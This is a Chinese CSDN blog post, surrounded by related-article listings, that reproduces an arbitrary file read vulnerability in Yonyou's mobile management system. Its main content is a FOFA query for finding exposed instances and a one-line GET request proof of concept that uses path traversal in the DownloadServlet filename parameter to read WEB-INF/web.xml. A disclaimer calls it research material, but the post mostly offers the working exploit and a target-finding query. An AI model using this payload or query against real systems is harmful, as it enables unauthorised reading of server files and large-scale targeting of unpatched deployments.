【漏洞复现】用友移动管理系统 DownloadServlet 任意文件读取漏洞

已于 2024-02-05 14:16:23 修改
阅读量390 收藏 10
点赞数 9
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络安全
于 2024-02-05 13:47:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/KKleeeaa/article/details/136040345
版权
本文提醒读者,Aniya网络安全实验室的文章仅供研究学习,用户需自行承担传播或利用信息可能产生的后果。提到的FOFA语句和漏洞POC示例(GET请求针对用友-移动系统管理的web.xml)应谨慎对待。
摘要由CSDN通过智能技术生成

声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01FOFA语句

app="用友-移动系统管理"

页面大概长这个样子

0x02漏洞POC

GET /servlet/~maportal/;/com.yonyou.maportal.bs.padplugin.controller.DownloadServlet?filename=../../WEB-INF/web.xml

Aniya也会哭
关注
  • 9
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
漏洞复现用友NC-download-文件读取
知黑而守白
01-23 144
用友NC是北京用友软件股份有限公司(简称“用友”)开发的一款企业管理软件,支持财务会计、人力资源、供应链、生产制造、客户关系管理等多个业务领域,涵盖了企业核心业务及管理流程。用友NC是基于B/S架构的软件系统,提供基于云计算、SaaS模式、本地部署等多种部署方式,广泛应用于国内外众多中小型企业和大型企业。用友NC download 接口存在任意文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。此漏洞可能导致泄露敏感信息,为攻击者提供足够的信息来进一步渗透系统。
用友UFIDA-NC download 任意文件下载漏洞复现(含nuclei-poc)
m0_50797689的博客
03-21 315
用友UFIDA-NC download 任意文件下载漏洞复现(含nuclei-poc)
用友-移动系统管理 DownloadServlet 文件读取(含批量验证poc)
weixin_58134620的博客
04-12 263
用友移动管理系 download接口存在一个任意文件读取漏洞,攻击者可通过构造静心设计的请求,成功利用漏洞读取服务器上的任意文件,包括敏感系统文件和应用程序配置文件等。利用此漏洞,攻击者能获得系统内的敏感信息,导致潜在的信息泄露风险。
0day 用友NC downCourseWare任意文件下载漏洞
weixin_43167326的博客
06-04 567
用友NC是一款成熟的企业级ERP软件,提供全面的财务、人力资源、采购、销售等多个模块,实现业务流程的数字化管理和资源协同。它具备高度定制化能力,适应不同企业的需求,并支持移动办公,提高工作效率。用友NC拥有丰富的功能和可靠的性能,帮助企业实现信息共享、业务流程优化和数据分析,提升竞争力和决策效果。
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 627
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
用友GRP-A++系统FileDownload接口存在拼接参数读取任意文件漏洞
weixin_43567873的博客
03-04 123
用友GRP-A++系统FileDownload接口存在拼接参数读取任意文件漏洞
用友移动管理系统 DownloadServlet 任意文件读取漏洞复现
0xSec
01-27 323
用友移动管理系统 DownloadServlet 接口处任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取内部系统敏感文件,使系统处于极不安全的状态。
用友U8CRM系统help2 任意文件读取漏洞复现
fly夏天的博客
12-23 706
用友U8+CRM系统的help2文件中接口存在任意文件读取漏洞,攻击者在未登录情况下即可进行漏洞利用。本文复现了这个漏洞并提供了进一步获取系统敏感文件的方法。
用友NC任意文件上传漏洞利用工具
04-14
用友NC任意文件上传漏洞利用工具,用友NC6.5的某个页面,存在任意文件上传漏洞漏洞成因在于上传文件处未作类型限制,未经身份验证的攻击者可通过向目标系统发送特制数据包来利用此漏洞,成功利用此漏洞的远程攻击...
用友软件的系统管理.pptx
11-21
用友软件系统管理 用友软件系统管理是指对用友软件系统的安装、配置、维护和管理。该系统是基于用友U8管理软件,旨在为中小企业提供一站式的信息化解决方案。下面是对用友软件系统管理的详细介绍: 一、用友软件...
用友账套数据文件信息读取.exe
04-15
账套数据文件信息读取.exe
【NC575】用友会员管理系统解决方案.pdf
06-07
用友会员管理系统解决方案】是针对企业会员管理需求设计的一套综合系统,旨在帮助企业高效、规范地管理和运营会员。该系统的核心目标是建立完善的会员资料档案,实施以积分为主的会员管理制度,通过各种业务活动和...
用友U8人力资源管理系统软件介绍.pdf
11-16
用友U8人力资源管理系统软件介绍.pdf
域名安全详解
TechEnthusiast的博客
08-06 148
域名安全网络安全的重要组成部分,涉及多个方面。
兼顾智能安全,医疗电子与AI如何打通?
bigbit_LiLi的博客
08-07 840
虽然目前光子计数技术仍在开发的过程中,但我们有理由相信,在不久后的将来,随着技术的进一步发展和应用拓展,光子计数有望在全球范围内得到更广泛的应用,为人类健康事业的发展做出更大的贡献。安森美耕耘医疗行业已经有三十多年的历史,例如在专业助听器的产品化落地中,安森美解决方案集成了多核处理器、先进的音频处理算法、低功耗蓝牙模块和丰富外围接口的系列核心产品,能够实现卓越的音质、长电池寿命和无线连接功能,帮助助听器制造商打造出高质量、智能化的助听器产品,显著提升用户的听觉体验。未来,医疗电子控制器肯定会国产化。
某通电子文档安全管理系统 CDGAuthoriseTempletService1接口SQL注入漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
08-09 463
某通电子文档安全管理系统的 CDGAuthoriseTempletService1 接口存在 SQL 注入漏洞。 攻击者可以通过构造特定的POST 请求注入恶意 SQL代码,利用该漏洞对数据库执行任意 SQL 操作,获取所有用户的账户密码信息,破解md5值后可直接接管后台,导致系统处于极不安全的状态。
应急响应-主机安全之系统及进程排查相关命令(Linux操作系统-初级篇)
关注网络安全、云原生安全
08-07 1107
本文介绍下在应急响应过程中,linux系统下排查系统、进程、服务可能用到的命令,有些命令选项很多,读者可以仅看常用选项。不涉及内存、进程注入、rootkit等高级攻击的排查。常用-n参数,n为展示的数量systemctl命令 是系统服务管理器指令,它实际上将 service 和 chkconfig 这两个命令组合到一起。任务旧指令新指令使某服务自动启动使某服务不自动启动检查服务状态systemctl status httpd.service (服务详细信息)
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值